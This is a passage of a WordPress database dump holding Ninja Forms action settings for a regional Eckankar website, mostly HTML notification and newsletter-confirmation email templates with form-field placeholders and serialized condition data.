/><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Parker Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Parker ECK Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_166}Â {field:lastname_167} </span>has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_166}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_167}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_168}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_169}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_170}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166807240}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_174}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(2105,80,'attach_csv','0','attach_csv','0'),(2106,80,'email_format','html','email_format','html'),(2107,80,'reply_to','','reply_to',''),(2108,80,'cc','','cc',''),(2109,80,'bcc','','bcc',''),(2110,80,'redirect_url','','redirect_url',''),(2111,80,'success_msg','','success_msg',''),(2112,80,'label','Admin Email','label','Admin Email'),(2113,80,'objectType','Action','objectType','Action'),(2114,80,'objectDomain','actions','objectDomain','actions'),(2115,80,'editActive','','editActive',''),(2116,80,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2117,80,'payment_gateways','','payment_gateways',''),(2118,80,'payment_total','0','payment_total','0'),(2119,80,'tag','','tag',''),(2120,80,'email_message_plain','','email_message_plain',''),(2121,80,'drawerDisabled','','drawerDisabled',''),(2122,80,'parent_id','20','parent_id','20'),(2123,81,'title','','title',''),(2124,81,'key','','key',''),(2125,81,'type','save','type','save'),(2126,81,'active','1','active','1'),(2127,81,'created_at','2018-01-03 11:45:53','created_at','2018-01-03 11:45:53'),(2128,81,'label','Save Form','label','Save Form'),(2129,81,'objectType','Action','objectType','Action'),(2130,81,'objectDomain','actions','objectDomain','actions'),(2131,81,'editActive','','editActive',''),(2132,81,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2133,81,'payment_gateways','','payment_gateways',''),(2134,81,'payment_total','0','payment_total','0'),(2135,81,'tag','','tag',''),(2136,81,'to','{wp:admin_email}','to','{wp:admin_email}'),(2137,81,'reply_to','','reply_to',''),(2138,81,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(2139,81,'email_message','{fields_table}','email_message','{fields_table}'),(2140,81,'email_message_plain','','email_message_plain',''),(2141,81,'from_name','','from_name',''),(2142,81,'from_address','','from_address',''),(2143,81,'email_format','html','email_format','html'),(2144,81,'cc','','cc',''),(2145,81,'bcc','','bcc',''),(2146,81,'redirect_url','','redirect_url',''),(2147,81,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(2148,81,'subs_expire_time','90','subs_expire_time','90'),(2149,81,'submitter_email','','submitter_email',''),(2150,81,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(2151,81,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(2152,81,'set_subs_to_expire','0','set_subs_to_expire','0'),(2153,81,'parent_id','21','parent_id','21'),(2154,82,'title','','title',''),(2155,82,'key','','key',''),(2156,82,'type','email','type','email'),(2157,82,'active','1','active','1'),(2158,82,'created_at','2018-01-03 11:45:53','created_at','2018-01-03 11:45:53'),(2159,82,'date_updated','2016-01-15','date_updated','2016-01-15'),(2160,82,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(2161,82,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(2162,82,'to','{field:email_309}','to','{field:email_309}'),(2163,82,'email_subject','Eckankar In Colorado - Newsletter','email_subject','Eckankar In Colorado - Newsletter'),(2164,82,'email_message','<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td style=\"padding-top: 2px\" width=\"100%\" valign=\"top\" bgcolor=\"#cccccc\"><!-- Start Header--><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td width=\"100%\" height=\"102\" bgcolor=\"#cccccc\"><!-- Logo --><table class=\"deviceWidth\" width=\"478\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"left\"><tbody><tr><td class=\"center\" style=\"padding-left: 10px;color: #23507d\" width=\"478\" height=\"102\"><p style=\"font-size: 20pt;letter-spacing: .05em\"><strong>Eckankar In Colorado</strong> <br style=\"font-size: 18pt;letter-spacing: .05em\"> Public Newsletter Subscription</p><p style=\"color: #333333;font-size: 14pt;letter-spacing: 0.03em;line-height: 10px\"><strong><em> Your Newsletter Subscription Confirmation</em></strong></p></td></tr></tbody></table><!-- End Logo --> <!-- Nav --><!-- End Nav --></td></tr></tbody></table><!-- End Header --> <!-- One Column --><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" bgcolor=\"#eeeeed\" align=\"center\"><tbody><tr><td style=\"padding: 3px;background-color: #23507d\" valign=\"top\"> </td></tr><tr><td style=\"font-size: 13px;color: #333333;font-weight: normal;text-align: left;font-family: Georgia, Times, serif;line-height: 24px;vertical-align: top;padding: 2px 10px 0px 8px\" bgcolor=\"#eeeeed\"><p style=\"font-size: 14px\"><strong>Hello {field:textbox_307}!   Thank You For Subscribing!</strong></p><p>We\'re happy that you have signed up to receive the Eckankar in Colorado Newsletter(s). You will find each publication filled with all the latest news and events for the entire state. The most current edition will be in your inbox soon!</p><p>You have subscribed to the following newsletter(s):</p><p><strong>{field:listmultiselect_318}</strong></p><p>Happy to have you on board.</p><p>Warm Regards,<br> <em>The Eckankar in Colorado Newsletter Team</em></p></td></tr></tbody></table><!-- End One Column --><!-- spacer --> <!-- 2 Column Images & Text Side by SIde --><!-- End 2 Column Images & Text Side by SIde --><!-- spacer --> <!-- Two Column (Images Stacked over Text) --><!-- End Two Column (Images Stacked over Text) --><!-- spacer --> <!-- Dark Background, Three Column Images --> <!-- 3 Small Images --><!-- End 3 Small Images --> <!-- Dark Background, Three Column Images --><!-- spacer --> <!-- 2 Column Images - text left --><!-- End 2 Column Images  - text left --><div style=\"height: 6px\"> </div><!-- spacer --> <!-- Blog Headlines --><!-- end blog headlines --> <!-- 4 Columns --><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td style=\"padding: 12px 0\" bgcolor=\"#363636\"><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td><table class=\"deviceWidth\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"left\"><tbody><tr><td class=\"center\" style=\"font-size: 10pt;color: #999;font-family: Arial, sans-serif;padding-bottom: 0px\" valign=\"top\" height=\"50\"><p>You are receiving this email because you subscribed via <a href=\"https://www.eckankar-colorado.org\" style=\"color: #999;text-decoration: underline\"> The Eckankar in Colorado Website</a></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table><!-- End 4 Columns --></td></tr></tbody></table>','email_message','<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td style=\"padding-top: 2px\" width=\"100%\" valign=\"top\" bgcolor=\"#cccccc\"><!-- Start Header--><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td width=\"100%\" height=\"102\" bgcolor=\"#cccccc\"><!-- Logo --><table class=\"deviceWidth\" width=\"478\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"left\"><tbody><tr><td class=\"center\" style=\"padding-left: 10px;color: #23507d\" width=\"478\" height=\"102\"><p style=\"font-size: 20pt;letter-spacing: .05em\"><strong>Eckankar In Colorado</strong> <br style=\"font-size: 18pt;letter-spacing: .05em\"> Public Newsletter Subscription</p><p style=\"color: #333333;font-size: 14pt;letter-spacing: 0.03em;line-height: 10px\"><strong><em> Your Newsletter Subscription Confirmation</em></strong></p></td></tr></tbody></table><!-- End Logo --> <!-- Nav --><!-- End Nav --></td></tr></tbody></table><!-- End Header --> <!-- One Column --><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" bgcolor=\"#eeeeed\" align=\"center\"><tbody><tr><td style=\"padding: 3px;background-color: #23507d\" valign=\"top\"> </td></tr><tr><td style=\"font-size: 13px;color: #333333;font-weight: normal;text-align: left;font-family: Georgia, Times, serif;line-height: 24px;vertical-align: top;padding: 2px 10px 0px 8px\" bgcolor=\"#eeeeed\"><p style=\"font-size: 14px\"><strong>Hello {field:textbox_307}!   Thank You For Subscribing!</strong></p><p>We\'re happy that you have signed up to receive the Eckankar in Colorado Newsletter(s). You will find each publication filled with all the latest news and events for the entire state. The most current edition will be in your inbox soon!</p><p>You have subscribed to the following newsletter(s):</p><p><strong>{field:listmultiselect_318}</strong></p><p>Happy to have you on board.</p><p>Warm Regards,<br> <em>The Eckankar in Colorado Newsletter Team</em></p></td></tr></tbody></table><!-- End One Column --><!-- spacer --> <!-- 2 Column Images & Text Side by SIde --><!-- End 2 Column Images & Text Side by SIde --><!-- spacer --> <!-- Two Column (Images Stacked over Text) --><!-- End Two Column (Images Stacked over Text) --><!-- spacer --> <!-- Dark Background, Three Column Images --> <!-- 3 Small Images --><!-- End 3 Small Images --> <!-- Dark Background, Three Column Images --><!-- spacer --> <!-- 2 Column Images - text left --><!-- End 2 Column Images  - text left --><div style=\"height: 6px\"> </div><!-- spacer --> <!-- Blog Headlines --><!-- end blog headlines --> <!-- 4 Columns --><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td style=\"padding: 12px 0\" bgcolor=\"#363636\"><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td><table class=\"deviceWidth\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"left\"><tbody><tr><td class=\"center\" style=\"font-size: 10pt;color: #999;font-family: Arial, sans-serif;padding-bottom: 0px\" valign=\"top\" height=\"50\"><p>You are receiving this email because you subscribed via <a href=\"https://www.eckankar-colorado.org\" style=\"color: #999;text-decoration: underline\"> The Eckankar in Colorado Website</a></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table><!-- End 4 Columns --></td></tr></tbody></table>'),(2165,82,'attach_csv','0','attach_csv','0'),(2166,82,'email_format','html','email_format','html'),(2167,82,'reply_to','','reply_to',''),(2168,82,'cc','','cc',''),(2169,82,'bcc','','bcc',''),(2170,82,'redirect_url','','redirect_url',''),(2171,82,'success_msg','','success_msg',''),(2172,82,'label','Send copy to user','label','Send copy to user'),(2173,82,'objectType','Action','objectType','Action'),(2174,82,'objectDomain','actions','objectDomain','actions'),(2175,82,'editActive','','editActive',''),(2176,82,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2177,82,'payment_gateways','','payment_gateways',''),(2178,82,'payment_total','0','payment_total','0'),(2179,82,'tag','','tag',''),(2180,82,'email_message_plain','','email_message_plain',''),(2181,82,'drawerDisabled','','drawerDisabled',''),(2182,82,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(2183,82,'parent_id','21','parent_id','21'),(2184,83,'title','','title',''),(2185,83,'key','','key',''),(2186,83,'type','successmessage','type','successmessage'),(2187,83,'active','1','active','1'),(2188,83,'created_at','2018-01-03 11:45:53','created_at','2018-01-03 11:45:53'),(2189,83,'date_updated','2016-01-15','date_updated','2016-01-15'),(2190,83,'from_name','','from_name',''),(2191,83,'from_address','','from_address',''),(2192,83,'to','{wp:admin_email}','to','{wp:admin_email}'),(2193,83,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(2194,83,'email_message','{fields_table}','email_message','{fields_table}'),(2195,83,'attach_csv','0','attach_csv','0'),(2196,83,'email_format','html','email_format','html'),(2197,83,'reply_to','','reply_to',''),(2198,83,'cc','','cc',''),(2199,83,'bcc','','bcc',''),(2200,83,'redirect_url','','redirect_url',''),(2201,83,'success_msg','<div style=\"text-align: center\"> </div><h2 style=\"text-align: center\"><span style=\"color: #23507d\"><strong>Thank you for subscribing to the Eckankar in Colorado Newsletter!</strong></span></h2><div style=\"text-align: center\"> </div><div style=\"text-align: center\">You will be receiving an email confirmation of your subscription(s) and your newsletter(s) will arrive in your email inbox very soon.</div><div style=\"text-align: center\"> </div><div style=\"text-align: center\"><br> <em>The Eckankar in Colorado Newsletter Team</em></div><div style=\"text-align: center\"> </div>','success_msg','<div style=\"text-align: center\"> </div><h2 style=\"text-align: center\"><span style=\"color: #23507d\"><strong>Thank you for subscribing to the Eckankar in Colorado Newsletter!</strong></span></h2><div style=\"text-align: center\"> </div><div style=\"text-align: center\">You will be receiving an email confirmation of your subscription(s) and your newsletter(s) will arrive in your email inbox very soon.</div><div style=\"text-align: center\"> </div><div style=\"text-align: center\"><br> <em>The Eckankar in Colorado Newsletter Team</em></div><div style=\"text-align: center\"> </div>'),(2202,83,'label','Success Message','label','Success Message'),(2203,83,'objectType','Action','objectType','Action'),(2204,83,'objectDomain','actions','objectDomain','actions'),(2205,83,'editActive','','editActive',''),(2206,83,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2207,83,'payment_gateways','','payment_gateways',''),(2208,83,'payment_total','0','payment_total','0'),(2209,83,'tag','','tag',''),(2210,83,'email_message_plain','','email_message_plain',''),(2211,83,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(2212,83,'set_subs_to_expire','0','set_subs_to_expire','0'),(2213,83,'subs_expire_time','90','subs_expire_time','90'),(2214,83,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(2215,83,'submitter_email','','submitter_email',''),(2216,83,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(2217,83,'parent_id','21','parent_id','21'),(2218,84,'title','','title',''),(2219,84,'key','','key',''),(2220,84,'type','email','type','email'),(2221,84,'active','1','active','1'),(2222,84,'created_at','2018-01-03 11:45:53','created_at','2018-01-03 11:45:53'),(2223,84,'date_updated','2016-01-19','date_updated','2016-01-19'),(2224,84,'from_name','Eckankar In Colorado - Newsletter Signup','from_name','Eckankar In Colorado - Newsletter Signup'),(2225,84,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(2226,84,'to','co.eck.dba@eckankar-colorado.org','to','co.eck.dba@eckankar-colorado.org'),(2227,84,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(2228,84,'email_message','<table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td>                                \"><h2><span style=\"color: #23507d;\">Eckankar In Colorado - Public Newsletter Subscription<br></span></h2></td><td> </td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><p><strong>Hello! You have a new \"Eckankar in Colorado Public Newsletter\" form submission.<br> </strong><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this email because you are listed as the contact to receive these new Newsletter subscription requests.</p><p>The following person has requested a <b>PUBLIC</b> subscription. </p></td></tr></tbody></table><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td>                                \"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_307}<br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_308}<br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_309}<br> <strong>STATE</strong></span><span style=\"color: #333333\"><strong>:</strong> {field:listselect_316}<br> </span><span style=\"color: #333333\"><strong>COUNTRY</strong></span><span style=\"color: #333333\"><strong>:</strong> {field:listcountry_317}<br> <strong>SUBSCRIPTION(S):</strong> {field:listmultiselect_318}<strong><br> </strong></span><span style=\"color: #333333\"><strong>ECK MEMBER?:</strong> </span></p></td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>','email_message','<table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td>                                \"><h2><span style=\"color: #23507d;\">Eckankar In Colorado - Public Newsletter Subscription<br></span></h2></td><td> </td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><p><strong>Hello! You have a new \"Eckankar in Colorado Public Newsletter\" form submission.<br> </strong><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this email because you are listed as the contact to receive these new Newsletter subscription requests.</p><p>The following person has requested a <b>PUBLIC</b> subscription. </p></td></tr></tbody></table><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td>                                \"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_307}<br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_308}<br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_309}<br> <strong>STATE</strong></span><span style=\"color: #333333\"><strong>:</strong> {field:listselect_316}<br> </span><span style=\"color: #333333\"><strong>COUNTRY</strong></span><span style=\"color: #333333\"><strong>:</strong> {field:listcountry_317}<br> <strong>SUBSCRIPTION(S):</strong> {field:listmultiselect_318}<strong><br> </strong></span><span style=\"color: #333333\"><strong>ECK MEMBER?:</strong> </span></p></td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>'),(2229,84,'attach_csv','0','attach_csv','0'),(2230,84,'email_format','html','email_format','html'),(2231,84,'reply_to','','reply_to',''),(2232,84,'cc','','cc',''),(2233,84,'bcc','','bcc',''),(2234,84,'redirect_url','','redirect_url',''),(2235,84,'success_msg','','success_msg',''),(2236,84,'label','Admin Email','label','Admin Email'),(2237,84,'objectType','Action','objectType','Action'),(2238,84,'objectDomain','actions','objectDomain','actions'),(2239,84,'editActive','','editActive',''),(2240,84,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelT